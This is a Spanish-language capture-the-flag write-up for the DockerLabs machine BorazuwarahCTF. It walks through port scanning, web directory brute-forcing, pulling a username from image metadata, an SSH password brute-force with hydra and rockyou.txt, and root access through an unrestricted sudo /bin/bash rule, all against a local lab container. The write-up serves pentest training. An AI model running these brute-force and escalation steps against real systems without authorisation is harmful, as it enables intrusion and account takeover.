BorazuwarahCTF
Introducción
Sección titulada «Introducción»En este artículo detallo la resolución de la máquina virtual BorazuwarahCTF, explicando paso a paso las técnicas y herramientas utilizadas para identificar y explotar las vulnerabilidades presentes en el sistema.
Información de la Máquina Virtual
Sección titulada «Información de la Máquina Virtual»- Nombre: BorazuwarahCTF
- Autor: BorazuwarahCTF
- Dificultad: Muy Fácil
- Fecha de creación: 28/05/2024
Paso 0: Instalación y Despliegue
Sección titulada «Paso 0: Instalación y Despliegue»-
Descargamos la máquina desde DockerLabs.
-
Descomprimimos el archivo ZIP:
Ventana de terminal unzip BorazuwarahCTF.zip -
Ejecutamos el script de despliegue:
Ventana de terminal sudo bash auto_deplo.sh BorazuwarahCTF.tar
Paso 1: Reconocimiento
Sección titulada «Paso 1: Reconocimiento»Identificación de la IP
Sección titulada «Identificación de la IP»La máquina devuelve su IP al ser desplegada, por lo que no es necesario usar herramientas como arp-scan.

Preparación del Entorno
Sección titulada «Preparación del Entorno»Creamos una estructura de carpetas para organizar los resultados:
mkdir BorazuwarahCTFcd BorazuwarahCTFmkt # Script personalizado que crea las carpetas content, exploits, nmap y scriptsEscaneo de Puertos
Sección titulada «Escaneo de Puertos»Escaneo completo para identificar puertos abiertos:
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPortsExtracción de los puertos abiertos:
extractPorts allPorts
Escaneo detallado de servicios:
nmap -sCV -p80 172.17.0.2 -oN targeted
Enumeración Web
Sección titulada «Enumeración Web»Identificamos que el puerto 80 está abierto, por lo que comenzamos con fuerza bruta de rutas usando gobuster:
gobuster dir -u http://172.18.0.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 200
Encontramos únicamente el archivo index, que contiene una imagen con el mensaje “¡Te quiero!”.

Descargamos la imagen y analizamos sus metadatos:
wget http://172.17.0.2/imagen.jpegexiftool imagen.jpeg
Obtenemos un posible nombre de usuario: borazuwarah.
Paso 2: Explotación
Sección titulada «Paso 2: Explotación»Ya con el usuario identificado, realizamos un ataque de fuerza bruta contra el servicio SSH:
hydra -l borazuwarah -P /usr/share/wordlists/rockyou.txt ssh://172.18.0.2 -t 4
Obtenemos las credenciales correctas y accedemos vía SSH.
Elevación de Privilegios
Sección titulada «Elevación de Privilegios»Verificamos los privilegios sudo:
sudo -lEl usuario puede ejecutar /bin/bash como cualquier otro usuario. Usamos searchbins para verificar si existe una ruta en GTFOBins:
searchbins -b bin -f bashEjecutamos el siguiente comando para obtener una shell con privilegios de root:
sudo /bin/bash
Conclusiones
Sección titulada «Conclusiones»- La máquina presenta un nivel de dificultad muy fácil, ideal para quienes están comenzando en el mundo del pentesting.
- Las fases de reconocimiento y explotación fueron bastante directas, pero ofrecen una buena práctica de flujo básico en CTFs.